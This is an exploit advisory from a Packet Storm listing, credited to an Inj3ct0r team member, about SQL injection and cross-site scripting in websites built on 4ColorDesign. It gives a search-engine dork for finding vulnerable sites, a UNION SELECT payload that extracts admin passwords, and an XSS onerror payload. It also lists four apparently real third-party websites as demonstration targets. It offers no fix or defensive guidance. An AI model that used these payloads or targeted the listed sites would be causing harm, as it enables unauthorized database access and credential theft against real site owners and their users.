4ColorDesign Cross Site Scripting / SQL Injection

2012-10-31T00:00:00
ID PACKETSTORM:117787
Type packetstorm
Reporter Ur0b0r0x
Modified 2012-10-31T00:00:00

Description

                                        
                                            `1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [x] Official Website: http://www.1337day.com 0  
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1  
0 0  
1 ============================================ 1  
0 I'm Ur0b0r0x Member From Inj3ct0r TEAM 1  
1 ============================================ 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1  
| |  
| 4ColorDesign - SQL Injection / Cross-Site Scripting Vulnerabilities |  
--------------------------------------------------------------------------  
  
# Ab0ut M3 ####################   
# Author: Ur0b0r0x  
# Tiwtte: @Ur0b0r0x  
# Email: ur0b0r0x_4n1@live.com  
  
  
# InF0 #########################  
# Exploit Title: 4ColorDesign - SQL Injection / Cross-Site Scripting Vulnerabilities  
# Vendor Name: 4ColorDesign  
# Url Vendor: http://4Colordesign.com  
# Category: WebApps  
# Type: php  
# Risk: Critical  
# Dork: intext:" powered by 4ColorDesign.com"  
# 0day exploits : 1337day.com Inj3ct0r Exploit DataBase   
  
  
# Expl0it ###################  
http://site.com/?????.php?id= < Sql Vulnerability Path >  
http://site.com/?????.php?id= < Xss Vulnerability Path >  
  
# Sql_Comand #=> +UNION+SELECT+1,2,password,4,5,6,7,8,9,10+from+admin  
  
# Xss_Comand #=> "><img src=x onerror=alert("1337");>   
  
# Dem0_Xss_Sql_Vulnerabilities  
http://www.culturaldolls.com/itemdetail.php?itemid=29'  
http://www.arunudyog.com/products.php?catcode=11'  
http://www.aradhanaindia.com/showproduct.php?cat=3'  
www.hindustanimpex.co.in/products.php?catcode=20'9'  
  
# 10'x #########################  
>> All Member Inj3ct0r Team   
>> | Mr.Pack | Nick Nitrous | Revolution_Hackers | Dylan Irzi | R00tc0d3r's | SecurityDev | Mafia Dz | Algerian Hacker |  
>> And All H4x0r5   
`